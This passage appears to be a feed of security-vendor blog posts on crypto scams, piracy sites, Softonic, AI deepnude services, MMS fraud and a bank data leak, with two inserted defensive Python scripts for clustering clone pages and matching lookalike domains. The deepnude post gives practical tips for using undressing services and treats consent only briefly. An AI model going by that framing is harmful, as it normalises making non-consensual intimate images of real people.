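                    "<body><nav><a href='/'>Home</a></nav><article><h2>Post</h2>"
                    "<p>Text</p><p>More</p></article><footer><p>Contact</p>"
                    "</footer></body></html>",
}

if __name__ == "__main__":
    for group in cluster(PAGES):
        print(group)
```

Rebranding a clone changes only text nodes, so the score between two rebranded copies stays at 1.0, and a small layout change lowers it only slightly.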

Personal Data Sharing

Beyond the financial loss, falling for such scams can have additional consequences. Users who register on these sites typically hand over their email addresses and phone numbers, which are then harvested and sold on the dark web. This can lead to further phishing attempts, identity theft, and even targeted ransomware attacks.

Some victims reported that after engaging with scam offers like 0.31 BTC Promo Code GRANTX, they began receiving calls from fake “crypto recovery services.” These fraudsters promised to retrieve stolen funds – for yet another fee, of course.

Thus, Xistrade.com and similar scams thrive on the desperation of individuals looking for quick financial gains. The promise of free Bitcoin is nothing more than a lure to extract real cryptocurrency from unsuspecting users. No legitimate exchange gives away free money without a verifiable and transparent process.

What Can I Do After Getting Scammed?

Your first step is to report the 0.31 BTC Promo Code GRANTX scam to authorities. Contact your crypto exchange if you made the deposit from a legitimate platform—they might be able to flag the transaction, though refunds are unlikely. You should also report Xistrade.com to authorities like the FTC, your country’s cybercrime unit, and cryptocurrency fraud reporting platforms. The more reports they receive, the faster they can take down the scam (before it inevitably reappears under a slightly different name).

Next, secure your accounts. If you used the same email and password on Xistrade.com as you do elsewhere, change your credentials immediately. Scammers often sell stolen login details on the dark web, meaning your email could soon be flooded with phishing attempts—or worse, your accounts could be hijacked. Enable two-factor authentication (2FA) wherever possible to add an extra layer of security.

If you provided personal details, be on high alert for follow-up scams. Fraudsters love to double-dip, and as I said above, they often pretend to be “crypto recovery experts” or even law enforcement officials offering to help for a fee. Ignore these attempts and never send more money.

X Token Presale Scam https://gridinsoft.com/blogs/x-token-presale-scam/ Tue, 28 Jan 2025 15:29:19 +0000

The X Token Presale scam is a novice crypto fraud linked to the social network X/Twitter and to Elon Musk as its owner. Despite the scam’s longstanding presence, efforts to combat it appear minimal, possibly because of inefficiency. A lot of people have fallen for this lure, so in this post I will explain what the X Token Presale scam is and how to recognize any of its instances.

X Token Presale Scam Overview

The X Token Presale scam is a deceptive scheme targeting cryptocurrency enthusiasts by promising early access to a revolutionary token at a discounted price. In brief, fraudsters create convincing fake websites and promotional materials to lure investors into transferring their cryptocurrency.

This scam takes advantage of the growing popularity of token presales, dirty promotion methods, and names and symbols that are on everyone’s lips. In our case the name echoes X (formerly Twitter), but that association does not make the scam any more credible.

Continuing with the theme of X, interestingly, there is also a legitimate project called “X Project” with a token named X-TOKEN. The real one positions itself as a DeFi initiative with features like a multichain wallet, decentralized exchange, and NFT marketplace. Its name may have been exploited by scammers to add credibility to their fraudulent operations.

How Does It Work?

Like many others, the X Token Presale scam operates through a combination of social engineering and technical manipulation. A key aspect of this scam is its connection to X/Twitter as a social media platform and its owner, Elon Musk, widely known for being an outstanding crypto optimist. That is one of the reasons why this social network serves as the primary source of advertising for this scam. As if X didn’t already have a sterling reputation for being a hotbed of scams and bots, this incident truly elevates it to a new level.

An X/Twitter spam screenshot
An X/Twitter spam for one of the scam sites

Most accounts promoting this scam are hacked in one way or another, with their owners unaware that their X accounts are being exploited to spread the X Token Presale scam. The campaign’s duration suggests a lack of urgent action from the platform moderators in addressing the issue, as some of the spam-distributing accounts even had blue ticks.

Upon clicking the X presale scam ads, users are redirected to websites designed to mimic reputable news outlets. These sites are complete with fabricated articles detailing the launch of the new cryptocurrency and offering access to a “private presale”. Such pages are meticulously crafted, featuring professional designs and persuasive language to lure potential investors.

Fake website screenshot
Fake website

To participate, users are prompted to create an account, providing personal information and setting up login credentials. Once registered, they are offered the chance to invest by purchasing the fictitious cryptocurrency, with payment required in established cryptocurrencies like Ethereum.

The minimum investment amount is often substantial, around $900, and transactions are directed to a recently established wallet, so recovering the funds is impossible. Sure enough, nothing says “foolproof investment” like wiring $900 to an anonymous wallet.

The scam employs several technical tactics to enhance its credibility. Among them are domain names that closely resemble legitimate websites related to the crypto industry, which reduces suspicion among potential victims. High-quality graphics, layouts, and user interfaces are also used to create a sense of legitimacy and trustworthiness. After investing, users can even log in to view their balance and transaction history, all of which are fictitious and designed to reinforce the illusion of a legitimate investment.

In some iterations of the scam, the perpetrators offered implausible incentives to entice larger investments, such as personalized investment advice from Elon Musk via WhatsApp or entries into raffles to win trips to Mars or Neuralink brain chips. It feels like the Nigerian prince scam on steroids, after a healthy bit of modernization.

Implausible incentives screenshot
Implausible incentives

Red Flags

To avoid becoming a victim of the X Token Presale scam, it is important to know its red flags and be able to spot them.

Too-Good-To-Be-True Promises. First, offers of guaranteed returns or exclusive access to presales with minimal risk are classic scam tactics. Remember, in the crypto world, high rewards always come with high risks.

Unverified Endorsements. Scammers often use fake endorsements from celebrities or influencers. In the age of AI, dark LLMs, deepfakes and similar tools, this is easy. So, if Elon Musk is suddenly offering you personalized advice via WhatsApp, you’re probably not about to get rich – unless you’re the scammer.

Urgency and Pressure. The human factor is the weakest link in the chain of defense against cyberattacks, so social engineering is a fail-safe weapon against the average Internet user. Scams frequently employ countdown timers or claims of limited availability to push victims into making hasty decisions. Take your time; the internet isn’t going anywhere.

Suspicious Websites. Check for signs of spoofed domains or poorly written content. Although scammers now pay more attention to the latter, most crypto scam sites are built from a template. Legitimate platforms invest in professional communication and secure web infrastructure.

Payment in Crypto Only. Most cryptocurrency buying platforms support multiple payment methods. Demands for payment exclusively in cryptocurrency, especially to anonymous wallets, should raise immediate red flags.

How to Protect Yourself

Research Thoroughly. Before investing in any project, verify its legitimacy by researching the team, whitepaper, and community feedback. If a project has no credible online presence, steer clear.

Check URLs Carefully. Always ensure the website you’re visiting is authentic. Look for sites established more than several weeks ago and avoid links from unsolicited messages. Also avoid such articles on Telegra.ph, as anyone can post anything there.

Beware of Impersonators. Be cautious of unsolicited messages or posts from accounts claiming to represent celebrities or major platforms. Verify the authenticity of such claims through official channels. Although the case of Trump and the Trump coin calls this point into question, I recommend not ignoring it.

Enable Security Measures. I emphasize this in almost every post, but unfortunately it is still necessary. Protect your accounts with strong passwords and two-factor authentication to prevent hackers from exploiting them.

Is Kissanime Safe? A Security Analysis (2025 Update) https://gridinsoft.com/blogs/kissanime-is-safe-analysis/ Mon, 13 Jan 2025 16:10:18 +0000

Kissanime (kissanimes.net) presents itself as a free library of thousands of anime titles, attracting viewers with its extensive collection and lack of paywalls. However, our comprehensive security analysis reveals significant risks associated with this platform. This investigation, combined with numerous user reports, exposes how the site actively engages in behaviors that compromise user security and privacy. Here’s what you need to know before visiting Kissanime in 2025.

Kissanime Safety Analysis: The Verdict

Our security analysis conclusively determines that Kissanime is unsafe and should be avoided by anyone seeking anime content online. Despite its attractive offering of free, diverse anime content without subscription requirements, the site exhibits multiple high-risk behaviors that pose significant threats to users’ cybersecurity and privacy.

Key Security Concerns

  • ⚠ Aggressive malicious advertising
  • ⚠ Unauthorized data collection practices
  • ⚠ Forced redirects to scam/malware sites
  • ⚠ Identity impersonation of legitimate services
  • ⚠ Consistent domain-hopping to evade takedowns

Our assessment is supported by multiple technical analyses, extensive user reports across forums like Reddit, and verification through website security services. Let’s examine each risk factor in detail to understand the full scope of threats this platform presents.

Screenshot of Kissanime main page showing multiple suspicious advertisements surrounding anime content
Kissanime’s interface is saturated with high-risk advertising that targets users with scams and malware

Dangerous Advertising Ecosystem

Predatory Ad Content

The most immediately visible security threat on Kissanime is its aggressive implementation of malicious advertising. Unlike legitimate sites that employ standard advertising networks, Kissanime’s ad ecosystem displays hallmarks of deliberately harmful implementation:

  • High-risk ad categories: Predominance of adult content, unregulated gambling operations, misleading “free” games, and fraudulent dating services
  • Geographic targeting: Ads dynamically change based on user location to maximize relevance for scam potential
  • Intentional misplacement: Deceptive positioning of ads to resemble navigation elements or video players, tricking users into clicking
  • Circumvention techniques: Implementation of methods specifically designed to bypass standard ad blockers

These advertisements aren’t merely annoying—they serve as entry points to sophisticated scam operations. Many redirect to phishing pages designed to capture credit card information, install malware, or trick users into paying for fraudulent services.

Data Harvesting Operations

Beyond visible ads, our technical analysis uncovered extensive data collection scripts operating in the background on Kissanime. These scripts engage in what security professionals call “traffic cloaking”—a technique that harvests user data without consent while obscuring this activity from detection.

The collected data typically includes:

  • Browsing patterns and history
  • Device information and identifiers
  • IP addresses and geolocation data
  • Browser fingerprinting data
  • Cross-site tracking identifiers

This information is then aggregated and sold to data brokers, who further distribute it to questionable third parties without user knowledge or consent. This practice represents a serious privacy violation and increases users’ vulnerability to targeted scams.

Forced Redirections and Social Engineering

Perhaps the most dangerous aspect of Kissanime is its aggressive implementation of forced browser redirections. Our testing revealed that normal navigation actions (clicking on content, menu items, or even empty space) frequently trigger the opening of new browser tabs containing highly deceptive content.

Common Malicious Redirect Tactics

Through repeated testing, we identified several patterns in these forced redirections:

  1. Fake video player overlays that mimic legitimate streaming interfaces but contain hidden redirect triggers
  2. False update notifications claiming users need a “special player” or codec to view content
  3. Counterfeit human verification systems that request users to complete tasks to “prove they’re human”
  4. QR code scanning requirements that lead to malware distribution sites
  5. Browser extension installation prompts for supposed “required viewing tools”

Screenshot showing a fraudulent QR code verification page that Kissanime redirects users to
Redirected page showing fraudulent QR code “verification” – scanning would lead to malware installation

These tactics employ social engineering principles to manipulate users into performing actions that compromise their security. Particularly concerning are the fake human verification systems that have become increasingly sophisticated and convincing.

Warning: QR codes on streaming sites represent a growing attack vector. Never scan QR codes presented on suspicious websites, as they frequently lead to credential theft or malware installation. Learn more about QR code phishing techniques to protect yourself.

Domain-Hopping and Identity Theft

Another significant red flag in our security assessment is Kissanime’s frequent domain changes and name appropriation practices. Unlike legitimate services that maintain stable web addresses, Kissanime operates across multiple rapidly-changing domains—a classic evasion tactic used by malicious websites to circumvent blocking and takedowns.

Documented Domain Variations

Our monitoring has identified numerous domain variations used by this operation in recent years:

  • kissanime.help
  • kissanimes.net
  • kissanime.com.ru
  • kissanime.com
  • kissanime.com.tr
  • kiss-anime.net
  • kiss-anime.ws

This constant domain shifting serves multiple malicious purposes:

  • Evading website blocklists maintained by security companies
  • Circumventing DMCA takedown actions for copyright infringement
  • Escaping user-reported blocks on forums and social media
  • Avoiding accumulation of negative reputation on any single domain
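Because each hop changes only the TLD or a character or two, a blocklist keyed on exact hostnames misses most of the variations listed above, while matching on the brand label catches them. The following is an added example, not Gridinsoft's detection logic; the single-entry blocklist, the benign hosts and the edit-distance threshold of 1 are constructed assumptions.

```python
# Domain variations listed in the article above.
ARTICLE_DOMAINS = [
    "kissanime.help", "kissanimes.net", "kissanime.com.ru", "kissanime.com",
    "kissanime.com.tr", "kiss-anime.net", "kiss-anime.ws",
]

# Constructed log entries: unrelated hosts that must not be flagged.
CONSTRUCTED_BENIGN = ["www.crunchyroll.com", "anime.example", "kissing-booth.example"]


def edit_distance(a, b):
    """Levenshtein distance, computed row by row."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1,                 # deletion
                           cur[j - 1] + 1,              # insertion
                           prev[j - 1] + (ca != cb)))   # substitution
        prev = cur
    return prev[-1]


def match_brand(hostname, brand="kissanime"):
    """Return why a hostname resembles the watched brand, or None.

    Every label is checked, so multi-part suffixes such as .com.ru need
    no public-suffix list.
    """
    for label in hostname.lower().rstrip(".").split("."):
        squeezed = label.replace("-", "")
        if label == brand:
            return "exact label"
        if squeezed == brand:
            return "hyphenated variant"
        if edit_distance(squeezed, brand) <= 1:
            return "near match (edit distance 1)"
    return None


def triage(hostnames, blocklist, brand="kissanime"):
    """Compare an exact-hostname blocklist with brand-label matching."""
    return {h: (h in blocklist, match_brand(h, brand)) for h in hostnames}


if __name__ == "__main__":
    # Assumption: the blocklist knows only one of the domains.
    results = triage(ARTICLE_DOMAINS + CONSTRUCTED_BENIGN, {"kissanimes.net"})
    for host, (blocked, reason) in results.items():
        print(f"{host:24} blocklist={blocked!s:5} brand={reason}")
```

Brand-label matching is a triage signal for review rather than a verdict, since a short brand name or a loose threshold will also match unrelated hosts.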

Brand Impersonation Tactics

Particularly concerning is the site’s deliberate impersonation of the original KissAnime service that operated legitimately in the early 2010s but has since shut down. This represents a form of brand theft designed to capitalize on the original site’s reputation and user trust.

Website footer showing Kissanime was previously known as GoGoAnime, revealing its pattern of name changes
Footer revealing the site previously operated as GoGoAnime before appropriating the KissAnime name

Our investigation into the site’s history reveals that it previously operated under the GoGoAnime brand (as admitted in the website’s own footer), which itself had accumulated a negative security reputation. The operation simply rebranded to Kissanime to escape this reputation while benefiting from name recognition of a defunct legitimate service.

Reddit discussions from the anime community confirm that the original KissAnime service permanently ceased operations and has no connection to current sites using this name.

How to Verify Website Safety

To help users independently verify the safety of Kissanime or any questionable website, we recommend utilizing specialized website security checking tools before visiting potentially malicious domains.

GridinSoft Website Reputation Checker Results

When analyzing kissanimes.net using GridinSoft’s Website Reputation Checker, the results confirmed our security assessment. The service identified kissanimes.net as having poor reputation scores across multiple security vendors, with specific flags for:

  • Malicious advertising implementation
  • Suspicious redirect behaviors
  • Potential malware distribution
  • Privacy policy violations

This free tool provides a quick way to verify website safety before visiting potentially dangerous sites. Simply enter any suspicious URL into the Website Reputation Checker to receive a comprehensive safety assessment within seconds.

Protecting Yourself From Adware and Browser Hijackers

If you’ve already visited Kissanime or similar sites, you may have inadvertently exposed your system to various forms of malware, particularly adware and browser hijackers. These malicious programs can cause symptoms similar to what you’d experience on Kissanime itself:

  • Unexpected browser redirections on legitimate websites
  • Excessive popup advertisements
  • New toolbars or extensions you don’t remember installing
  • Changed browser homepage or search engine
  • Slower than normal browser performance

Preventative Measures

To protect yourself from these threats, implement these security practices:

  1. Use reputable ad-blocking extensions like uBlock Origin or AdGuard to prevent malicious advertising
  2. Install script-blocking extensions such as NoScript or ScriptSafe to prevent unwanted code execution
  3. Regularly audit browser extensions and remove any you don’t recognize or need
  4. Maintain updated browsers to benefit from the latest security patches
  5. Consider using a dedicated malware scanner to detect and remove browser threats

For comprehensive protection, we recommend GridinSoft Anti-Malware, which offers specialized detection for browser-based threats like those distributed through sites like Kissanime. Its network security module provides real-time protection against malicious websites and can clean existing infections that may have already compromised your system.

Safe Alternatives for Anime Streaming

Rather than risking your security with sites like Kissanime, consider these legitimate alternatives for anime content:

  • Crunchyroll – Offers substantial free content with ads, plus premium subscriptions
  • Funimation – Specializes in dubbed anime with both free and premium tiers
  • Netflix – Increasingly expanding its anime catalog with exclusive titles
  • Hulu – Features a growing selection of both classic and current anime
  • Amazon Prime Video – Includes anime content within its standard subscription
  • HiDive – Specialized anime streaming service at affordable price points

While these services typically require payment for full access, they provide legal, high-quality content without exposing users to security risks. Many offer free trials or ad-supported tiers that allow limited viewing without payment.

Frequently Asked Questions

Is using Kissanime illegal?

While viewing streamed content on Kissanime may exist in a legal gray area depending on your country’s copyright laws, the site clearly violates copyright by distributing content without permission from rights holders. More importantly from a user perspective, the site engages in numerous security violations that put your personal data and device security at risk. Legal considerations aside, the security risks alone make it inadvisable to use the site.

Can using a VPN make Kissanime safe to use?

No. While a VPN might mask your IP address and provide some privacy protection, it cannot prevent the site’s malicious redirects, deceptive ads, or social engineering tactics. These threats operate at the browser level after the encrypted VPN connection, meaning they can still compromise your system. Additionally, when you interact with content on the site (such as entering information or downloading files), a VPN provides no protection against these actions.

Will an ad blocker protect me on Kissanime?

Ad blockers can mitigate some risks by blocking visible advertisements and certain tracking scripts, but Kissanime employs sophisticated anti-adblock technologies specifically designed to circumvent these protections. Our testing found that even with premium ad blockers enabled, the site was still able to execute certain redirects and tracking scripts. While an ad blocker is better than no protection, it cannot guarantee safety on deliberately malicious sites like Kissanime.

How can I tell if my computer is already infected from visiting Kissanime?

Common indicators of infection include: unexpected browser redirects when visiting legitimate websites, new toolbars or extensions you don’t remember installing, changed browser homepage or search engine, excessive popup advertisements even on reputable sites, and slower than normal browser or system performance. If you notice these symptoms, your system may have been compromised by adware or other malware. Running a comprehensive scan with a specialized anti-malware program is recommended to identify and remove these threats.

Are all free anime streaming sites dangerous like Kissanime?

While not all free anime streaming sites present the same level of risk as Kissanime, unauthorized streaming sites generally operate in a legal gray area that often correlates with security risks. Without legitimate business models, these sites typically rely on aggressive and often malicious advertising to generate revenue. Sites that frequently change domains, lack transparent ownership information, display excessive advertisements, or require suspicious “verification” steps should be approached with extreme caution or avoided entirely.

Is Softonic Safe? https://gridinsoft.com/blogs/is-softonic-safe/ Fri, 03 Jan 2025 13:28:18 +0000

Softonic is a popular website that offers various software for downloading, in both free and paid versions. With it appearing on top of search results, users may think of it as a legit source of different programs. However, deeper research reveals quite worrying facts. But is Softonic safe to use? Can it spread viruses? Let me explain in this article.

What is Softonic?

For those who are only vaguely familiar with Softonic, it is a large software library website; think of it as an application market, but in a web format and for PC. The website started long ago and officially partners with software developers, helping them promote and distribute their programs.

Softonic main page

Together with the official version, the site may offer cheaper license options from various sources. In this case, they team up with other online services that look for discounts, game accounts available for sale, and so on. This combination of official and wallet-friendly options is what gave the website its popularity, yet it also raised quite a few questions about legality.

Is Softonic Safe to Use?

The short answer to that question is yes, it is mostly safe, as there are almost no risky applications offered on this platform. Pirated programs, keygens or activators of different sorts, which typically serve as a source of malware, are excluded as a class here. But deeper research reveals a few points that made me concerned about the ethical and legal aspects of the question.

Excessive Advertising

The Softonic website is quite literally flooded with advertisements. While this is not an unheard-of practice, and one can easily name a handful of other legit sites that have the same problem, the situation with Softonic is different.

Typical situation at Softonic website: there are more ads than there is actual content

In ad placement and info sharing, it uses both Google Ads and other, “alternative” ad networks, some of which are recognized as quite clearly unwanted. To put it simply, data about you and your actions on the website will end up in the hands of shady actors. It is not always the beginning of a bad story, yet it is better to avoid trying your luck with such questionable characters altogether.

List of “advertising partners” that get access to your data on Softonic. The site never asks your permission for this.

Dangers that ads on Softonic can pose typically range from unwanted applications to adware and browser hijackers. Nothing too serious, but I’m pretty sure no one will like seeing their browser overfilled with ads and running a strange starting page.

Bundled software distribution and copyright violations

Softonic goes further with its dodgy monetization practices by pushing bundled software together with the program you download. This is particularly the case when we talk about free programs and apps that are no longer supported by their developers. The site even got into a public argument with a community of free game developers for continuing to offer the game packed with bundled apps even after the game itself was shut down.

Twitter thread with the indie game developer community Itch.io complaining about Softonic behavior

As you may guess, revenue from each installed bundled application goes into their pockets. Same as in the case of on-site ads, there is little to no control over what exactly is promoted, meaning that there is a high chance of getting an unwanted program installed along with the desired program.

Questionable Discount Offers

Almost all the discounts that Softonic offers its users come from strange websites that specialize in selling software license keys for cheap. While it may look like a type of legit business, it may also be part of a black-market network related to money laundering. Stolen or otherwise illegally acquired funds are “washed clean” by purchasing software and reselling it at a discounted price. Alternatively, these licenses may have been leaked following a spyware/infostealer attack, in which case their cost for the reseller is effectively 0.

Who would ever offer a 93% discount, and how?

Sure enough, not all cheaper offers are about some dodgy activity, but this is what backs the majority of such offers. Buying software for cheap from a discounter shop that shares no info about how it got such a deal eventually turns into sponsoring future shady activity. Some of them talk about reselling “used licenses”, yet there is no evidence of them being pre-owned.

Also, it is possible to have issues while purchasing the game or program, and there will be little to no remedy. There may be payment issues and delays; digital license keys may not work, or the offered software may not meet your expectations. When buying from a developer, you will get such problems sorted out in a matter of minutes with the help of tech support. Yet I personally question the quality and availability of support on those third-party reseller websites.

During my own research, ESDCodes, one of these discounter websites, turned out to be extremely unresponsive and laggy. Buying from it already feels risky, as you can get stuck at every step, including checkout. Also, there is little to no info on how the site operates, and the FAQ/About Us sections are filled with generic, useless information.

Can I use Softonic to download programs?

Yes, you can. At the end of the day, even with all the said quirks in mind, Softonic is a totally normal software library that offers (mostly) safe and legit software. If you are desperate to get a specific piece of software at a lower price, this may be a good place to look.

Yet my recommendation will be to stick to the source, i.e. purchase programs at the websites of their respective developers. This way, you ensure that no ad injection or shady money manipulations happen in the background. I will also recommend using a strong anti-malware solution – to eliminate any risks related to the software from unofficial sources.

GridinSoft Anti-Malware is a program that will get you covered. Its multi-component detection system will quickly recognize and block any malicious activity, including one coming from the most modern advanced threats. Download it by clicking the banner below, and try all-encompassing protection with a 6-day free trial option.

AI Deepnude Websites – Are they Safe & Trustworthy? https://gridinsoft.com/blogs/ai-deepnude-sites-safe/ Mon, 30 Dec 2024 16:20:39 +0000

The development of generative AI that is capable of creating images gave an expected push for AI deepnude web services. People are eager to remove clothing from someone around them, and that wish was around for quite some time now. But how safe is it to use such services? And is it legal? Let’s find out together.

Are AI Deepnude Sites Safe & Legit?

First and foremost – yes, there are quite a lot of online AI deepnude services that are totally real, and you will in fact get the undressed photo in return. The availability of open-source AI models allows quite a few entrepreneurs to get into such activities, so you can see quite literally dozens of them around.

Example of an AI deepnude website

Yet not all the websites are safe and will do what is promised. There are enough con actors who see the rush towards AI undressing services and try to get their bite without offering any actual services, or by tricking users into shady activities. Let me walk you through the key risks that you may face trying to use AI deepnude websites.

Privacy risks

One of the main concerns regarding any online AI services, deepnude ones included, is privacy. Photos generated by the AI are kept on the website; there is no real way to enforce their encrypted state, as they appear as a part of the content. Thus, pics of someone you know may soon appear in advertising materials of this, or a different deepnude service – and there is nothing you can do about that. Even if you ask for GDPR user data removal, edited pictures are likely to be stored separately, i.e. they do not belong to user-specific data.

AI deepnude sites data risks

A question that touches all sites that operate in such a spicy industry is data security. You upload the pictures of someone you know, share your email address, nickname and, in certain cases, even location. The data of one user is not a big deal, but data of thousands of people makes much more impact and costs a lot on shady marketplaces.

Not all AI undressing websites sell data, but it is particularly hard to control whether they are going to. The general rule of thumb is to use a burner email and expose as little real data about yourself as possible. That is particularly needed when we take into account the next problem.

Ethical concerns

One major part of any dealings with someone’s naked photos is ethics. While consensual photos of that kind are not a problem at all, ones created with AI generation are. You can face a significant backlash or even have legal problems for generating such images and sharing them publicly. Even if one has generated the picture for themselves, it may get leaked to the public due to the way the service operates.

Another ethical aspect is the possibility of a malicious misuse of deepnude technologies. It is common to see blackmail messages that threaten to publish some compromising graphical materials about the user. While before all these threats had nothing backing them up, nowadays wannabe-hackers may really generate some naked content with the victim and start posting it online. Sure, it will be quite simple to tell it is an AI generated image, but it is hard to miss how unpleasant and dirty the situation is.

We have several articles with a deep-dive into scammers blackmailing people with threats of posting their explicit photos online, consider checking them out.

AI deepnude scams

The most critical issue with AI deepnude generators is the wide variety of scams that this industry is riddled with. A huge influx in popularity, along with an unclear understanding of how such services should work, makes it an ideal field for fraudsters.

Asking for money, returning nothing. One of the most common and obvious scams is taking money for generating the picture and returning nothing, or a subpar image. Bad service quality is compounded by the inability to get your money back. To stay under the radar of payment systems, such sites ask one to pay for a seemingly unrelated thing on a separate website. And this is exactly what makes reversing the payment impossible.

It is worth noting that even legit deepnude services used this scheme. Payment systems like PayPal or Venmo, along with banks, refuse to work with shady businesses such as undressing services. As a result, they are forced to ask users to pay indirectly, for example by purchasing a lot they’ve created on a different site, thereby spoofing the payment purpose.

Collecting excessive amounts of user data. Another possible way of defrauding customers is by asking for excessive amounts of information during registration. The resulting images may in fact be of a subpar quality, but fraudsters will get every single sensitive detail about you before you can try out the site. All such services collect user data to some extent, but only malicious ones ask for way too much info and definitely aim at selling the data in the future.

Demanding the user to install applications. One of the ways of monetization that AI deepnude websites may pick is by prompting users to install certain apps or browser extensions. While there is a possibility of some of these apps being safe and legit, it is much more likely to get something shady and unwanted. Adware, browser hijackers or even scareware may use undressing AI sites for spreading – and you never know what exactly they offer you to download.

How do I understand that an Undressing AI Website is Safe?

To see whether the website you have found is trustworthy or not, consider using our free Website Reputation Checker. This web utility performs comprehensive checks of the website, and returns a clear verdict of whether there is any questionable activity happening.

It may be particularly complicated to understand whether the AI deepnude site is trustworthy before using it without special tools. Risking the money is not an option for many, and using only free options means exposing yourself to risk with even higher probability. That is why a Website Reputation Checker will be the best choice for that situation.

For continuous protection though, I would recommend you to install GridinSoft Anti-Malware. Its web protection feature will block shady websites at the very moment they are trying to open in your web browser. Download it by clicking the banner below and enable Internet Security in the Protect tab – that will get you covered.

Top 3 MMS Scams: What Threats Can Messages Bring https://gridinsoft.com/blogs/mms-scams-threats/ Fri, 13 Dec 2024 09:25:38 +0000

MMS is a rather old technology that is being pushed out of the market by proper messenger applications. Nonetheless, fraudsters seem to be interested in abusing it for their profit: tons of MMS scams appeared over the last few months, targeting different countries under different disguises. Let me explain in detail what they are about and how you can avoid such a danger.

MMS Scams Are on the Rise

Researchers have noticed a significant increase in messaging scams, i.e. ones that rely upon messages sent over cellular networks rather than through the Internet. Since May, reports of abusive mobile messages in the U.S. have surged by 39%. But within this trend, one notable aspect catches the eye: fraudsters are turning to old, seemingly forgotten technologies, with one of them being MMS abuse.

Over the same period, complaints about fraudulent MMS messages have skyrocketed by 220%. These scams often use images or graphics to enhance the credibility of their messages. Effects of such scams, however, are not really different from email or social media spam: lost money, exposed personal data and potential identity theft.

Short reminder – MMS is…?

MMS is short for Multimedia Messaging Service, one of two messaging technologies offered by cellular carriers. Back in the days when phones weren’t smart, this and SMS were the only way to exchange pics and text. MMS is built on the same foundation as SMS, but unlike the latter allows users to send and receive multimedia content via cellular network, such.

With the advent of iMessage, WhatsApp, and other messengers, this technology was thought to be obsolete. Quite a few cell carriers have disabled this service due to the absent demand. Still, it is so seamlessly integrated into mobile messaging today that most people don’t even notice when they’re using it. Well, scammers definitely notice, and aim at abusing it at any given moment.

MMS Abuse Details

The numbers paint a worrying picture. Since the beginning of the year, the reports about MMS scams surged by 429%, with most of the uptick happening in the last few months. In fact, the increase in scammer interest in multimedia messages started around October 2023, but was increasing pretty slowly until summer of 2024. Today, MMS scams represent over 21% of reported abuses.

The numbers are definitely influenced by the large number of devices capable of receiving these messages. We are talking not only about mobile phones, but also all IoT devices capable of holding a SIM-card. The overall estimate of the devices that may receive a scam message floats around 300 million in the US alone – that is about 90% of the country’s population.

Research has also shown how quickly people tend to read and respond to mobile messages, usually within just three minutes. That clears out the reason for such an unusual interest from cybercriminals: folks appear to treat cell messages as a more important, and probably a more trusted thing.

Scam Examples

MMS scams take various forms, but they all rely on visuals to deceive people. Con actors might send fake notifications pretending to be from banks or financial institutions, claiming there’s an issue with your account. There are 3 main types of fraudulent messages that you can expect – impersonation scams, fake invoices and delivery scams.

We begin with impersonation attacks, ones that target people under the guise of a renowned company or a person. Scammers use MMS capabilities to send “proof” of their legitimacy, i.e. documents or pictures of themselves. Though the capabilities of modern photo editing technology are known to a wide audience, such a fraud works mostly with the elderly and children.

MMS scam example

The key demand in impersonation scams is, as usual, money or sensitive information. Fraudsters talk about a lucrative “send money, receive twice as much back” program or about being in need of a tiny bit of money with the promise of returning it in 2-3 days.

Delivery scams are one of the longest running ones, with attacks happening ever since major delivery services started sending notifications via SMS. The scammer sends a message pretending to be from a courier service like FedEx, UPS, or DHL. The message claims that a package couldn’t be delivered due to incorrect shipping details or unpaid fees.

Fake message from DHL

The link that is always attached to the message should help with “rescheduling delivery” or “paying outstanding charges”. In fact, it leads to a phishing site designed to steal credit card information or personal details. These scams are especially effective during busy shipping seasons like the holidays, when many people are expecting deliveries and thus lose vigilance.

Another type of fraud is fake invoice scams. In this type of scam, you may receive a message that includes an image of a fake invoice or receipt for a product or service you didn’t purchase. The scam often claims you owe money and provides a link or phone number to “resolve the issue.” For instance, a scammer might send a message pretending to be from an online retailer, saying you’ve been charged for an expensive item you didn’t order.

How to Avoid MMS Scams

Staying safe from MMS scams doesn’t require much – just a little caution can go a long way. If you receive a suspicious message, especially one with images or links, avoid interacting with it. Only share your phone number with trusted sources to reduce the chances of being targeted. If a message includes a link, don’t click on it. Instead, use your browser or a verified app to visit the sender’s official website directly.

Android offers to report spam

If you suspect a message is a scam, report it. iOS and Android devices have a built-in feature “Report Spam”. You can also forward the message to 7726 (SPAM) to alert your mobile provider and help improve scam detection. Lastly, always download apps from trusted app stores to minimize potential risks. Carefully review the permissions requested by these apps before granting access.

Hacker Leaks BBVA Bank Data, Including User Details https://gridinsoft.com/blogs/hacker-leaks-bbva-bank-information/ Tue, 12 Nov 2024 17:39:37 +0000

On November 11, 2024, a hacker known as Gatito_FBI_NZ published an extensive pack of data they leaked from BBVA Bank of Peru. It includes extensive information related to bank transactions, including personal information about bank customers. The hacker asks for no money, offering access to all the leaked info right away.

BBVA Hacked, Transaction Data Leaked on the Darknet

The BBVA Bank leak published by Gatito_FBI_NZ consists of a huge number of tables that contain well-structured data about transactions that the bank has handled. The leak covers records from the last several months and contains cardholder names, location of transactions (down to the establishment where the payment was made), date, card status and also some internal codes.

BBVA bank leak darknet forum post

Want to know more about information leaks? We have a dedicated article with all the different types and consequences of data leaks, be sure to check it out.

One more detail that should concern the clients of the bank (and BBVA themselves, obviously) is that the hacker also shares usernames and passwords for admin accounts of the bank's technical pages. Sure enough, the bank infrastructure admins will change them pretty soon, but this clearly demonstrates that Gatito_FBI_NZ really had access to the network. This is also confirmed by the screenshots of internal interfaces with corresponding data displayed on them.

List of passwords that the hacker managed to leak from the bank network

In the publication, the hacker also mentioned “a vulnerability”, which is potentially the short explanation of how they got into the bank’s internal network. However, there are no details on which exact flaw was used; the word may simply be misused, considering the rest of the message.

It is rather strange that the attacker asks nothing for such a data chunk. It is typical for cybercriminals to dispose of less important info they’ve got from a hack, creating additional pressure on the attacked company. This may actually be the case in this attack: the hacker did not find anything special in the BBVA Bank data and decided to make it public. Whether they got their hands on actually important data is something we do not know.

Is there a risk for BBVA bank clients?

With such a massive data leak, especially considering that it is readily available to the public, there can and will be attacks based on it. Mainly they will revolve around email, SMS and voice phishing scams, or, in certain cases, attempts to charge a bank account. This gives us enough info to offer some precautionary advice: follow it for a few months, and the risks will decrease significantly.

  1. Any offers that are too good to be true are not true. If someone offers you a tempting deal and it looks like they know you, you’d better check everything twice before accepting that offer. With the information from databases, adversaries can understand your habits and thus prepare a well-disguised targeted attack.
